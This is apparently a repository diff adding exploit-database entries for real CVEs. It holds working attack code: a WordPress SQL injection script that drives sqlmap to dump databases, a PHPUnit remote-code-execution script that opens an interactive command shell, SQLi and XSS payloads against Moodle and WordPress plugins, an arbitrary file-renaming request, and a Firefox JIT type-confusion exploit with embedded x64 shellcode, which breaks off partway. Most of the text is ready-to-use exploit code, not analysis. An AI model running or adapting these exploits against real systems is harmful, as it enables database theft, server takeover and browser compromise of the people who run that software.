8P Y8 8P 88ooooo odD' 88 d'88 88 dP `V8o88' oooY' odD' oooY'
8b `8b d8' 88~~~~~ C8888D .88' 88 d' 88 88 V8888b. C8888D d8' ~~~b. .88' ~~~b.
Y8b d8 `8bd8' 88. j88. `88 d8' 88 `8D d8' db 8D j88. db 8D
`Y88P' YP Y88888P 888888D `Y88P' VP 88oobY' d8' Y8888P' 888888D Y8888P'
[+] 404 to 301 - SQL-Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import argparse
import os
import requests
from datetime import datetime
import json
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# SQL-Injection (Exploit):
# Generate payload for sqlmap
print ('[+] Payload for sqlmap exploitation:')
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')
exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'
exploit_risk = ' --level 2 --risk 2'
exploit_cookie = r' --cookie="' + cookie + r'" '
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'
os.system(exploit_code)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

33
exploits/php/webapps/50699.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: PHP Restaurants 1.0 - SQLi (Unauthenticated)
# Google Dork: None
# Date: 01/29/2022
# Exploit Author: Nefrit ID
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0
# Tested on: Kali Linux & Windows 10
*SQL injection is a code injection technique used to attack
data-driven applications, in which malicious SQL statements are
inserted into an entry field for execution (e.g. to dump the database
contents to the attacker). wikipedia*
===Start===
Exploit Url = http://localhost/php_restaurants-master/admin/functions.php?f=deleteRestaurant&id=1337
AND (SELECT 3952 FROM (SELECT(SLEEP(5)))XMSid)
Burpsuite Proxy Intercept
GET /php_restaurants-master/admin/functions.php?f=deleteRestaurant&id=1337
HTTP/1.1
Host: web_server_ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://web_server_ip/php_restaurants-master/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: uid=1
Connection: close

30
exploits/php/webapps/50700.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Moodle 3.11.4 - SQL Injection
# Date: 30/01/2022
# Exploit Author: lavclash75
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.11 to 3.11.4
# CVE: CVE-2022-0332
# POC
```
GET /moodle-3.11.4/webservice/rest/server.php?wstoken=98f7d8003180afbd46ee160fdc05a4fc&wsfunction=mod_h5pactivity_get_user_attempts&moodlewsrestformat=json&h5pactivityid=1&sortorder=%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C4%2C1%29%29%3E104%29%20THEN%20%27%27%20ELSE%20%28SELECT%205080%20UNION%20SELECT%204100%29%20END%29%29 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Host: local.numanturle.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
```
```
```
![PHP](img/orderby.jpg?raw=true "PHP")
![PHP](img/uri.jpg?raw=true "PHP")
![PHP](img/sqlmap.jpg?raw=true "PHP")
# Reference
* [CVE-2022-0332](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0332)
* [Git](https://git.moodle.org/gw?p=moodle.git;a=blobdiff;f=mod/h5pactivity/classes/external/get_user_attempts.php;h=8a27f821bc37f20bafaba6ef436871717b3817a3;hp=216653e93315c4d8ca084fe1e62b2041dece4531;hb=c7a62a8c82219b50589257f79021da1df1a76808;hpb=2ee27313cea0d7073f5a6a35eccdfddcb3a9adad)

54
exploits/php/webapps/50702.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2022/01/30
# Exploit Author: souzo
# Vendor Homepage: phpunit.de
# Version: 4.8.28
# Tested on: Unit
# CVE : CVE-2017-9841
import requests
from sys import argv
phpfiles = ["/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]
def check_vuln(site):
vuln = False
try:
for i in phpfiles:
site = site+i
req = requests.get(site,headers= {
"Content-Type" : "text/html",
"User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
},data="<?php echo md5(phpunit_rce); ?>")
if "6dd70f16549456495373a337e6708865" in req.text:
print(f"Vulnerable: {site}")
return site
except:
return vuln
def help():
exit(f"{argv[0]} <site>")
def main():
if len(argv) < 2:
help()
if not "http" in argv[1] or not ":" in argv[1] or not "/" in argv[1]:
help()
site = argv[1]
if site.endswith("/"):
site = list(site)
site[len(site) -1 ] = ''
site = ''.join(site)
pathvuln = check_vuln(site)
if pathvuln == False:
exit("Not vuln")
try:
while True:
cmd = input("> ")
req = requests.get(str(pathvuln),headers={
"User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
"Content-Type" : "text/html"
},data=f'<?php system(\'{cmd}\') ?>')
print(req.text)
except Exception as ex:
exit("Error: " + str(ex))
main()

21
exploits/php/webapps/50703.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control
# Date: 2/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-fo...ck-tester/
# Version: 1.0.2
# Tested on: Windows 10
# CVE: CVE-2021-24247
1. Description:
The plugin settings are visible to all registered users in the dashboard.
A registered user can leave a payload in the plugin settings.
2. Proof of Concept:
- Register an account
- Navigate to the dashboard
- Go to CF7 Check Tester -> Settings
- Add a form
- Add a field to the form
- Put in a payload in either Field selector or Field value "><script>alert(1)</script>
- Save
Anyone who visits the settings page will execute the payload.

13
exploits/php/webapps/50704.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)
# Date: 3/16/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/
# Version: 1.13.21
# Tested on: Windows 10
# CVE: CVE-2021-24300
1. Description:
This plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting.
2. Proof of Concept:
wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover=alert(1);//

14
exploits/php/webapps/50705.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
# Date: 3/16/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/post-grid/
# Version: 2.1.1
# Tested on: Windows 10
# CVE: CVE-2021-24488
1. Description:
This plugin creates a post grid from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//

76
exploits/php/webapps/50706.txt Normal file
View file

@ -0,0 +1,76 @@
# Exploit Title: WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
# Date: 08-01-2022
# Exploit Author: Ceylan Bozogullarindan
# Author Webpage: https://bozogullarindan.com
# Vendor Homepage: https://thimpress.com/
# Software Link: https://thimpress.com/learnpress-plugin/
# Version: 4.1.4.1
# Tested on: Linux
# CVE: CVE-2022-0377 (https://wpscan.com/vulnerability/0d95ada6-53e3-4a80-a395-eacd7b090f26)
# Description:
LearnPress is a WordPress complete solution for creating a Learning Management System (LMS). It can help you to create courses, lessons and quizzes.
A user of this LMS can upload an image as a profile avatar after the registration. After this process the user crops and saves the image. Then a "POST" request that contains user supplied name of the image is sent to the server for renaming and cropping of the image. As a result of this request, the name of the user-supplied image is changed with a MD5 value. This process can be conducted only when type of the image is JPG or PNG.
An attacker can use this vulnerability in order to rename an arbitrary image file. By doing this, he/she can destroy the design of the web site. Some examples of the malicious actions:
- Destroying of banner of a web site
- Destroying of user avatars
- Destroying of post images
- Destroying of button/app images etc.
# Steps To Reproduce
1. Register and login to the learnpress system.
2. Go to the profile page and upload an avatar image: https://<learnpress-website>/lp-profile/<your-username>/settings/avatar/
3. While saving the image, intercept the POST request by a local proxy tool such as Burpsuite.
4. Change the value of the `lp-user-avatar-crop[name]` parameter to an arbitrary image file path that is in the website (example, /2021/01/image.png or /../../image.png). The path is relative to "/wp-content/uploads/".
5. Forward the intercepted request and check the existence of the image file given in Step 4.
6. You will see that the image can not be found. Because the name of it is renamed.
# PoC - Supported Materials
Request
---------------------------------------------------------------------------
POST /lp-profile/<username>/settings/avatar/?lp-ajax=save-uploaded-user-avatar HTTP/1.1
Host: 127.0.0.1:8000
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 242
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/lp-profile/ceylanb/settings/avatar/
Cookie: _learn_press_session_4411def9d576984c8d78253236b2a62f=4509d5151308952d51776226bb847241%7C%7C1641770556%7C%7C19e385a78349f37ac993a36ecda9c41f; wordpress_lp_cart=1; wordpress_logged_in_4411def9d576984c8d78253236b2a62f=ceylanb%7C1642807471%7CRKS5hU3q1b2G0xY1pkwfl43yVJdIqz9fqBLcknvbyzJ%7C98d337987ee0cbc7539a742e2ebbfbe107d1e0c910c3efd9daa51c4775236e19; LP=%7B%22course-tab%22%3A%22overview%22%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
DNT: 1
Sec-GPC: 1
lp-user-avatar-crop%5Bname%5D=%2f..%2f..%2fimage.jpg&lp-user-avatar-crop%5Bwidth%5D=250&lp-user-avatar-crop%5Bheight%5D=250&lp-user-avatar-crop%5Bpoints%5D=0%2C0%2C300%2C300&lp-user-avatar-crop%5Bnonce%5D=8bdc969b07&lp-user-avatar-custom=yes
---------------------------------------------------------------------------
Response
---------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 00:30:11 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://127.0.0.1:8000/wp-json/>; rel="https://api.w.org/"
Link: <http://127.0.0.1:8000/wp-json/wp/v2/pages/17>; rel="alternate"; type="application/json"
Link: <http://127.0.0.1:8000/?p=17>; rel=shortlink
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html; charset=UTF-8
<-- LP_AJAX_START -->{"success":true,"avatar":"<img src=\"http:\/\/127.0.0.1:8000\/wp-content\/uploads\/learn-press-profile\/2\/f574f3e6594498507333c41af9426d43.jpg\" \/>"}<-- LP_AJAX_END -->
---------------------------------------------------------------------------

38
exploits/windows/local/50690.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: CONTPAQi® AdminPAQ 14.0.0 - Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2022-01-16
# Software Link: https://www.contpaqi.com/descargas
# Tested Version: 14.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 pro x64 english
# Step to discover Unquoted Service Path:
C:\Users\test>wmic service get name, displayname, pathname, startmode |
findstr /i "Auto" | findstr /i "AppKeyLicenseServer_CONTPAQi"
Servidor de Licencias CONTPAQir AppKeyLicenseServer_CONTPAQi
C:\Program Files (x86)\Compac\Servidor de
Licencias\AppkeyLicenseServer\AppKeyLicenseServer.exe Auto
C:\Users\test>sc qc "AppKeyLicenseServer_CONTPAQi"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AppKeyLicenseServer_CONTPAQi
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Compac\Servidor de
Licencias\AppkeyLicenseServer\AppKeyLicenseServer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Servidor de Licencias CONTPAQi®
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would cause the local user to be able to insert their
code in the system root path undetected by the OS or other security
applications and elevate his privileges after reboot.

741
exploits/windows/local/50691.txt Normal file
View file

@ -0,0 +1,741 @@
# Exploit Title: Mozilla Firefox 67 - Array.pop JIT Type Confusion
# Date: 2021-12-07
# Type: RCE
# Platform: Windows
# Exploit Author: deadlock (Forrest Orr)
# Author Homepage: https://forrest-orr.net
# Vendor Homepage: https://www.mozilla.org/en-US/
# Software Link: https://ftp.mozilla.org/pub/firefox/releases/65.0.1/win64/en-US/
# Version: Firefox 67.0.2 64-bit and earlier
# Tested on: Windows 10 x64
# CVE: CVE-2019-11707
# Bypasses: DEP, High Entropy ASLR, CFG
# Full Hydseven exploit chain with sandbox escape (CVE-2019-11708): https://github.com/forrest-orr/Exploits/tree/main/Chains/Hydseven
<html>
<head>
</head>
<body>
<script>
/*
_______ ___ ___ _______ _______ _______ _____ _______ _____ _____ _______ _______ _______
| _ | Y | _ |______| | _ | _ | _ |______| _ | _ | _ | _ | _ |
|. 1___|. | |. 1___|______|___| |. | |.| | | |______|.| |.| |___| |. | |___| |
|. |___|. | |. __)_ / ___/|. | `-|. |\___ | `-|. `-|. | / /|. | | / /
|: 1 |: 1 |: 1 | |: 1 \|: 1 | |: |: 1 | |: | |: | | | |: 1 | | |
|::.. . |\:.. ./|::.. . | |::.. . |::.. . | |::.|::.. . | |::.| |::.| | | |::.. . | | |
`-------' `---' `-------' `-------`-------' `---`-------' `---' `---' `---' `-------' `---'
Overview
This is a Windows variation of CVE-2019-11707, an exploit targetting a type
confusion bug in the Array.pop method during inlining/IonMonkey JIT compilation
of affected code in versions of Firefox up to 67.0.2.
Fundamentally this bug allows an attacker to trick IonMonkey into JIT'ing a
function popping and accessing an element of a specially crafted malicious
array without generating any speculative guards on the element type. In other
words, we can reliably produce an ASM routine for a JS function which is only
designed to handle array element access for a specific object type, while
allowing us to effectively modify the type of the element being accessed. Thus
a class object may be accessed as a float, a float as an integer, and so on.
The end result is a classic type confusion on the ASM layer which is leveraged
into an OOB array access, providing the basis for construction of R/W/AddressOf
primitives.
More specifically this bug allows for the creation of specially crafted malicious
arrays with a specific element type set. By creating a function which loops
through this malicious array and calls Array.pop on its elements, IonMonkey
can be made to JIT an ASM routine specifically optimized to only handle this
one specific type of array element. The bug comes into affect in the unique
edge case of an object prototype: when Array.pop attempts to access an element
at an index which does not exist (such as in a sparse array) it will then make
a secondary, fall-back attempt to access this element index on the prototype
of its associated array. This would not be an issue if IonMonkey tracked
modifications to the type sets of prototype elements but it does not.
...
bool hasIndexedProperty;
MOZ_TRY_VAR(hasIndexedProperty, ArrayPrototypeHasIndexedProperty(this, script()));
if (hasIndexedProperty) {
trackOptimizationOutcome(TrackedOutcome::ProtoIndexedProps);
return InliningStatus_NotInlined;
}
...
This was the vulnerable piece of code in IonMonkey which enabled the bug. It
can be plainly seen that they did attempt to check types of indexed elements
on array prototypes but did so incorrectly: every array will by default have a
special ArrayPrototype object associated with it. However, we do not need to
leave this default layout intact. We can set a custom prototype on our
malicious array (this custom prototype itself being an array) and trick the
engine into checking the ArrayPrototype of our custom prototype for indexed
elements instead of the custom prototype which contains the malicious untracked
elements. Practically speaking:
var SparseTrapdoorArray = [BugArrayUint32, BugArrayUint32];
This will produce:
SparseTrapdoorArray -> ArrayPrototype
Now if a new array is created and set as the custom prototype of
SparseTrapdoorArray:
var CustomPrototype = [new Uint8Array(BugArrayBuf)];
SparseTrapdoorArray.__proto__ = CustomPrototype;
This will produce:
SparseTrapdoorArray -> CustomPrototype -> ArrayPrototype
Thus an element access on a non-existent element of SparseTrapdoorArray will
access this same index on CustomPrototype instead, and it will be the
ArrayPrototype of CustomPrototype which is checked by IonMonkey during
inlining, not the actual prototype of the SparseTrapdoorArray array ie. the
CustomPrototype. If SparseTrapdoorArray[0] were to not exist and be accessed,
it would result in an access to the Uint8Array element at CustomPrototype[0]
despite the JIT'd function being optimized for access to Uint32Array at
SparseTrapdoorArray[0].
~
Design
I created the exploit primitives for CVE-2019-11707 in much the same way as I
did CVE-2019-17026: the heap is groomed so that 3 objects are lined up
in memory. In this case they are ArrayBuffers.
[ArrayBuffer 1][ArrayBuffer 2][ArrayBuffer 3]
We use the bug to overflow array 1 and corrupt the ArrayBuffer of array 2,
artificially augmenting its length to encompass the NativeObject of array 3.
From this point onward, array 2 is used to corrupt the slots pointer within the
NativeObject of array 3 to do arbitrary reads, writes and addrof.
Once these primitives are obtained, a JIT spray is used to plant an egg hunter
shellcode in +RX memory within the firefox.exe content process being hijacked.
The ASM source for my egg hunter can be found here:
https://github.com/forrest-orr/Exploits/blob/main/Payloads/Source/DoubleStar/Stage1_EggHunter/Egghunter64.asm
The role of this egg hunter is to search out a magic QWORD in memory prefixing
an arbitrary shellcode (in this case a WinExec shellcode) stored as a
Uint8Array somewhere in this content process, disable DEP on it, and execute
it via a branch instruction.
The JIT code pointer of the JIT sprayed function is identified by using the
arbitrary read/addrof primitives to walk its JitInfo struct, and then a
secondary egg hunter within the JS itself is used to scan this JIT'd region for
the JIT sprayed egg hunter shellcode itself, stored as a double float array and
implanted at the end of the JIT'd ASM. Once this array is found, the JIT code
pointer is modified to point to it, and the JIT sprayed function is run one
last time, resulting in the WinExec shellcode being found in memory, set to
executable and executed.
~
Sandboxing
The lineage of the Firefox application involves a Medium Integrity AppContainer
firefox.exe "parent" process which is responsible for making network
connections and handling the UI, with a set of Low Integrity child/content
firefox.exe processes beneath it, each locked to a specific domain (in the past
it was one process per tab, now its one process per site) and responsible for
parsing and potentially compiling/executing Javascript.
The exploit in this source file is only able to compromise the child/content
process. These processes are heavily sandboxed, and are not able to make network
connections, perform (almost) any file I/O, launch processes, or affect the UI.
This means that by default, neither WinExec or MessageBox shellcodes will work
in this exploit.
For an example of how the child/content process sandbox may be escaped via a
secondary exploit, see either my Hydseven or Double Star exploit chains:
https://github.com/forrest-orr/Exploits/tree/main/Chains/Hydseven
https://github.com/forrest-orr/DoubleStar
In the case of this standalone exploit, in order to be able to see the affect
of a successful payload execution post-exploitation, you must adjust the
security.sandbox.content.level in the "about:config" down from 5 to atleast 2.
~
Credits
0vercl0k - for the original research/analysis of CVE-2019-11708 and reverse
engineering of xul.dll for "god mode" patching.
sherl0ck - for his writeup on CVE-2019-11707.
*/
////////
////////
// Global helpers/settings
////////
const Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]);
var JITIterations = 10000; // Number of iterations needed to trigger JIT compilation of code. The compilation count threshold varies and this is typically overkill (10+ or 1000+ is often sufficient) but is the most stable count I've tested.
var HelperBuf = new ArrayBuffer(8);
var HelperDbl = new Float64Array(HelperBuf);
var HelperDword = new Uint32Array(HelperBuf);
var HelperWord = new Uint16Array(HelperBuf);
var OverflowArrays = []
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20)); // <- Overflow from here
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
var BugArrayBuf = OverflowArrays[5];
var CorruptedArrayBuf = OverflowArrays[6];
var MutableArray = OverflowArrays[7];
var BugArrayUint32 = new Uint32Array(BugArrayBuf);
var SparseTrapdoorArray = [BugArrayUint32, BugArrayUint32];
////////
////////
